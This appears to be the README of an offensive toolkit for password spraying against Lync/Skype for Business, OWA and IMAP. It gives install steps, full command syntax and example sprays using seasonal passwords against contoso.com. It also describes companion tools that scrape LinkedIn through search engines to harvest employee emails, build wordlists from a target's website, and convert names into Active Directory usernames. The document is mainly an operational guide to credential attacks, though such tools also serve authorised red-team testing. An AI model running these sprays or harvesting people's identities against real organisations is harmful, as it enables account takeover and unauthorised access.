A set of Python scripts/utilities that tries to make password spraying attacks against Lync/S4B & OWA a lot quicker, less painful and more efficient.
Come hang out on Discord!
Install the pre-requisites with pip3 as follows:
sudo -H pip3 install -r requirements.txtOr use a Python virtual environment if you don't want to install the packages globally.
A blazing fast password sprayer for Lync/Skype For Business and OWA, built on Asyncio and Python 3.7
Usage:
atomizer (lync|owa|imap) <target> <password> <userfile> [--targetPort PORT] [--threads THREADS] [--debug]
atomizer (lync|owa|imap) <target> <passwordfile> <userfile> --interval <TIME> [--gchat <URL>] [--slack <URL>] [--targetPort PORT][--threads THREADS] [--debug]
atomizer (lync|owa|imap) <target> --csvfile CSVFILE [--user-row-name NAME] [--pass-row-name NAME] [--targetPort PORT] [--threads THREADS] [--debug]
atomizer (lync|owa|imap) <target> --user-as-pass USERFILE [--targetPort PORT] [--threads THREADS] [--debug]
atomizer (lync|owa|imap) <target> --recon [--debug]
atomizer -h | --help
atomizer -v | --version
Arguments:
target target domain or url
password password to spray
userfile file containing usernames (one per line)
passwordfile file containing passwords (one per line)
Options:
-h, --help show this screen
-v, --version show version
-c, --csvfile CSVFILE csv file containing usernames and passwords
-i, --interval TIME spray at the specified interval [format: "H:M:S"]
-t, --threads THREADS number of concurrent threads to use [default: 3]
-d, --debug enable debug output
-p, --targetPort PORT target port of the IMAP server (IMAP only) [default: 993]
--recon only collect info, don't password spray
--gchat URL gchat webhook url for notification
--slack URL slack webhook url for notification
--user-row-name NAME username row title in CSV file [default: Email Address]
--pass-row-name NAME password row title in CSV file [default: Password]
--user-as-pass USERFILE use the usernames in the specified file as the password (one per line)
./atomizer.py owa contoso.com 'Fall2018' emails.txt./atomizer.py lync contoso.com 'Fall2018' emails.txt./atomizer lync contoso.com --csvfile accounts.csv./atomizer lync contoso.com --user-as-pass usernames.txt./atomizer owa 'https://owa.contoso.com/autodiscover/autodiscover.xml' --recon./atomizer.py owa contoso.com passwords.txt emails.txt -i 0:45:00 --gchat <GCHAT_WEBHOOK_URL>A port of @OrOneEqualsOne's GatherContacts Burp extension to mitmproxy with some improvements.
Scrapes Google and Bing for LinkedIn profiles, automatically generates emails from the profile names using the specified pattern and performes password sprays in real-time.
(Built on top of Atomizer)
mitmdump -s vaporizer.py --set sprayer=(lync|owa) --set domain=domain.com --set target=<domain or url to spray> --set password=password --set email_format='{f}.{last}'By default email_format is set to {first}.{last} pattern and is not a required argument.
The domain parameter is the domain to use for generating emails from names, the target parameter is the domain or url to password spray
Install the mitmproxy cert, set the proxy in your browser, go to google and/or bing and search (make sure to include the /in):
site:linkedin.com/in "Target Company Name"
Emails will be dumped to emails.txt in the specified format, and passed to Atomizer for spraying.
Scrapes all text from the target website and sends it to AWS Comprehend for analysis to generate custom wordlists for password spraying.
Still a work in progress
mitmdump -s aerosol.py --set domain=domain.comConverts names to active directory usernames (e.g Alice Eve => CONTOSO\aeve)
Usage:
spindrift [<file>] [--target TARGET | --domain DOMAIN] [--format FORMAT]
Arguments:
file file containing names, can also read from stdin
Options:
--target TARGET optional domain or url to retrieve the internal domain name from OWA
--domain DOMAIN manually specify the domain to append to each username
--format FORMAT username format [default: {f}{last}]
Reads names from STDIN, --domain is used to specify the domain manually:
cat names.txt | ./spindrift.py --domain CONTOSOReads names from names.txt, --target dynamically grabs the internal domain name from OWA (you can give it a domain or url)
./spindrift.py names.txt --target contoso.com